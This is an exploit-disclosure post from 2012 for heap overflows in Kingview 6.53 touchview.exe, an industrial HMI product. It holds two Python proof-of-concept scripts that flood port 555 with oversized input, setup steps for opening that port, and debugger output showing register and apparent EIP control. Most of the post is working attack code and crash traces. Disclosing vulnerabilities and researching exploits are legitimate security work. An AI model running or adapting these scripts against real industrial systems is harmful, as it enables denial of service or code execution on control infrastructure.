Kingview Touchview 6.53 Heap Overflows
Posted on 25 June 2012
# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2 # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.kingview.com # Version: 6.53 # Tested on: Windows SP 1 # CVE : Open kingivew click on Make choose network configuration--->network parameter , then go to the node type and choose Local is a Login Server, run the demo port 555 will be open. NOTE: This was already patched by the vendor silently. import os import socket import sys host ="10.0.2.15" port = 555 exploit=("D"*70000) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((host,port)) s2.send(exploit) data = s2.recv(1024) s2.close() eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748 edi=00000004 eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!tan+0xcf: 7c902a9d 8b18 mov ebx,dword ptr [eax] ds:0023:42424242=????? c902a8d 55 push ebp 7c902a8e 8be9 mov ebp,ecx 7c902a90 8b5504 mov edx,dword ptr [ebp+4] 7c902a93 8b4500 mov eax,dword ptr [ebp] 7c902a96 0bc0 or eax,eax 7c902a98 740c je ntdll!tan+0xd8 (7c902aa6) 7c902a9a 8d4aff lea ecx,[edx-1] 7c902a9d 8b18 mov ebx,dword ptr [eax] ds:0023:42424242=???????? 7c902a9f f00fc74d00 lock cmpxchg8b qword ptr [ebp] 7c902aa4 75f0 jne ntdll!tan+0xc8 (7c902a96) 7c902aa6 5d pop ebp 7c902aa7 5b pop ebx 7c902aa8 c3 ret 7c902aa9 8d4900 lea ecx,[ecx] 7c902aac 8f0424 pop dword ptr [esp] 7c902aaf 90 nop 7c902ab0 53 push ebx 7c902ab1 55 push ebp ############################################################### # Exploit Title: Kingview Touchview EIP direct control # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.kingview.com # Version: 6.53 # Tested on: Windows SP 1 # CVE : Open kingivew click on Make choose network configuration--->network parameter , then go to the node type and choose Local is a Login Server, run the demo port 555 will be open. NOTE: This was already patched by the vendor silently. import os import socket import sys host ="10.0.2.15" port = 555 exploit=("B"*80000) s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((host,port)) s2.send(exploit) data = s2.recv(1024) s2.close() 7c91b1ea 8b4610 mov eax,dword ptr [esi+10h] 7c91b1ed 3bc3 cmp eax,ebx 7c91b1ef 8945fc mov dword ptr [ebp-4],eax 7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f (7c91b296) 7c91b1f8 8b06 mov eax,dword ptr [esi] 7c91b1fa ff4010 inc dword ptr [eax+10h] ds:0023:42424252=???????? 7c91b1fd 8b45fc mov eax,dword ptr [ebp-4] 7c91b200 83e001 and eax,1 7c91b203 8945e8 mov dword ptr [ebp-18h],eax ntdll!RtlpWaitForCriticalSection+0x5b
